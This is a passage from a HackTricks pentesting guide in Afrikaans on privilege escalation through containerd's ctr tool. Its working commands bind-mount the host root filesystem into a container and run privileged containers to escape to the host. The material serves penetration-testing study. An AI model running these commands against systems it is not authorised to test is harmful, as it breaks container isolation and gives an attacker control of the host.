3.8 KiB
Containerd (ctr) Voorregverhoging
{% hint style="success" %}
Leer en oefen AWS-hacking:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer en oefen GCP-hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Controleer de abonnementsplannen!
- Sluit aan bij de 💬 Discord-groep of de telegramgroep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacktrucs door PR's in te dienen bij de HackTricks en HackTricks Cloud github-repos.
Basiese inligting
Gaan na die volgende skakel om te leer wat containerd is en ctr
:
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}
PE 1
as jy vind dat 'n gasheer die ctr
-opdrag bevat:
which ctr
/usr/bin/ctr
Jy kan die afbeeldings lys:
ctr image list
REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
En hardloop dan een van daardie afbeeldings deur die gasheer se hoofmap daaraan te koppel:
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
PE 2
Voer 'n houer met voorregte uit en ontsnap daaruit.
Jy kan 'n houer met voorregte hardloop as:
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
Dan kan jy van sommige van die tegnieke wat genoem word op die volgende bladsy gebruik om daaruit te ontsnap deur misbruik te maak van bevoorregte vermoëns:
{% content-ref url="docker-security/" %} docker-security {% endcontent-ref %}
{% hint style="success" %}
Leer & oefen AWS-hacking:HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer & oefen GCP-hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kontroleer die inskrywingsplanne!
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.